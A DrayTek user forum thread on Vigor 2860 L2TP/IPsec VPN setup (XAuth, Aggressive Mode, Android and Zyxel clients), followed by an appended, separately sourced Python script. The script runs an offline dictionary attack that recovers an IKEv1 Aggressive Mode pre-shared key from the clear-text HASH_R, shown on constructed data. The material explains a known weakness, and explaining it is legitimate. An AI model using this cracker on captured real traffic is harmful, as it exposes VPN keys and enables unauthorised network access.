DrayTek UK Users' Community Forum
Help, Advice and Solutions from DrayTek Users
L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where?
- hornbyp
21 Dec 2018 17:18 #93610
by hornbyp
Replied by hornbyp on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
//cont'd//
This:

An XAuth user (or user group) is a RAS user who authenticates when connecting to the security device using an AutoKey IKE VPN tunnel. Although both IKE and XAuth users can authenticate through an AutoKey IKE VPN tunnel, the authentication of IKE users is actually the authentication of VPN gateways or clients, while the authentication of XAuth users is the authentication of the individuals themselves. XAuth users must enter information that only they are supposed to know: their username and password.

implies that although it can authenticate a "user", it can also authenticate a "device". DrayTek's implementation (on the 2860
- routintooter (Topic Author)
22 Dec 2018 12:54 #93611
by routintooter
Replied by routintooter on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
Thanks for that Hornbyp!
My friend said that trying to get X.509 working resulted in him losing a few hairs.
If I have any more updates from tinkering, I'll add them here.
Thanks again.
- hornbyp
27 Dec 2018 01:37 #93618
by hornbyp
Replied by hornbyp on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
I wrote:
The Android client (8.0 and maybe others) can be made to use Aggressive Mode, along with its per-user PSK. Unfortunately, the Vigor 2860 cannot be made to respond to it properly.
A variety of 3rd party VPN clients exist (though all seem to be commercial offerings). Some of these offer Aggressive Mode. I might investigate if any of them can successfully connect to the Vigor 2860, as a means of shedding light on the failure point in (4.) above.

I tried a VPN client from Zyxel (Zywall?) ... which seems to be a rebranded version of the Greenbow client (and is a similar sort of price). That connected quickly and easily to the 2860, using Aggressive mode and a per-user key. So, whatever the issue is with Android, it does seem to be at the Android end.
However, having done some more research into Aggressive Mode, it seems it needs to be used with caution. If you're connecting directly to an ISP at each end of the link, the chance of the plain text PSK hash being intercepted is pretty low (unless the ISP is under the influence of a government agency!).
However, if you're connecting via some dodgy WiFi network (that you don't trust and hence the use of the VPN), it definitely could happen. Once the PSK hash has been acquired, an attacker can spend as long as they want, mounting offline attacks against it. So its use in (say) a Chinese hotel might not be advisable :o ...
See:
https://www.pivotpointsecurity.com/blog/vpn-security-risks-main-aggressive-mode/

I also wrote:
XAuth authentication support recently appeared on the Vigor 2860. I'm puzzled as to how this has been implemented - and I've not really got it to work.

Revisiting this, I remembered that I did get it working on Android; the problem on Windows being that it's only supported by the 3rd party (£) VPN clients. The downside to XAuth is that it also uses a Global PSK and needs a local (not Radius) Dial-in user. The global PSK is effectively authenticating the device - but, if compromised, doesn't seem to be of any use by itself (unlike the global "IPsec" General key).
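The "PSK hash" offline attack described in the post above, worked through as an added example (this is not code from the forum thread, from DrayTek or from the Vigor 2860 firmware). In IKEv1 Aggressive Mode the responder's HASH_R travels in the clear in message 2, and RFC 2409 defines it as a HMAC keyed by SKEYID, which for pre-shared-key authentication is itself derived from the PSK and the two nonces. Every other input (DH public values, ISAKMP cookies, nonces, the initiator's SA payload, the responder's ID) is also visible on the wire, so a passive observer can recompute HASH_R for candidate PSKs until one matches. Assumptions in the example: SHA-1 as the negotiated PRF, DH group 2 sizes, and a constructed exchange (random bytes plus a made-up FQDN identity) standing in for a real capture.

```python
"""IKEv1 Aggressive Mode with PSK: offline dictionary attack on HASH_R.

Added example, not from the forum post or from DrayTek. Formulas follow
RFC 2409 sections 3.2, 5 and 5.4. All "captured" values are constructed
here; a real capture would be the two clear-text Aggressive Mode messages
on UDP/500.
"""
import hashlib
import hmac
import os

ID_FQDN = 2  # ISAKMP identification type for a DNS name (RFC 2407)


def prf(key: bytes, data: bytes, hash_name: str = "sha1") -> bytes:
    """IKEv1 PRF: HMAC with the negotiated hash algorithm (RFC 2409 3.2)."""
    return hmac.new(key, data, getattr(hashlib, hash_name)).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, hash_name: str = "sha1") -> bytes:
    """SKEYID for pre-shared-key authentication: prf(PSK, Ni_b | Nr_b)."""
    return prf(psk, ni_b + nr_b, hash_name)


def hash_r(skeyid: bytes, g_xr: bytes, g_xi: bytes, cky_r: bytes, cky_i: bytes,
           sai_b: bytes, idir_b: bytes, hash_name: str = "sha1") -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b, hash_name)


def crack_psk(capture: dict, wordlist, hash_name: str = "sha1"):
    """Offline dictionary attack: recompute HASH_R for each candidate PSK.

    Everything in `capture` was sent in the clear in Aggressive Mode
    messages 1 and 2, so anyone on the path (hostile WiFi, say) has it.
    Only the PSK is unknown. Returns the matching candidate or None.
    """
    for candidate in wordlist:
        psk = candidate.encode()
        skeyid = skeyid_psk(psk, capture["ni_b"], capture["nr_b"], hash_name)
        guess = hash_r(skeyid, capture["g_xr"], capture["g_xi"], capture["cky_r"],
                       capture["cky_i"], capture["sai_b"], capture["idir_b"], hash_name)
        if hmac.compare_digest(guess, capture["hash_r"]):
            return candidate
    return None


def constructed_capture(psk: bytes) -> dict:
    """Fake an Aggressive Mode exchange whose responder knows `psk`.

    Constructed test data: DH public values, cookies, nonces and the SA
    payload body are random bytes of plausible size, not a real capture.
    """
    cap = {
        "g_xi": os.urandom(128), "g_xr": os.urandom(128),  # DH group 2 public values
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),    # ISAKMP header cookies
        "ni_b": os.urandom(20), "nr_b": os.urandom(20),    # nonce payload bodies
        "sai_b": os.urandom(52),                           # initiator SA payload body
        # IDir_b: ID type, protocol, port, then the identity (constructed FQDN)
        "idir_b": bytes([ID_FQDN, 0, 0, 0]) + b"vpn.example.net",
    }
    skeyid = skeyid_psk(psk, cap["ni_b"], cap["nr_b"])
    cap["hash_r"] = hash_r(skeyid, cap["g_xr"], cap["g_xi"], cap["cky_r"],
                           cap["cky_i"], cap["sai_b"], cap["idir_b"])
    return cap


if __name__ == "__main__":
    cap = constructed_capture(b"Summer2018")  # the responder's real PSK (constructed)
    wordlist = ["password", "draytek", "Summer2018", "letmein"]
    print("recovered PSK:", crack_psk(cap, wordlist))
```

The attack needs no interaction with the router once the two messages are captured, which is why the post's point about untrusted networks matters: the cost is one HMAC per candidate, so a short or dictionary PSK falls quickly. In Main Mode with PSK the corresponding HASH_I and HASH_R are carried encrypted in messages 5 and 6, so a passive observer does not get this starting point.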
Copyright © 2024 DrayTek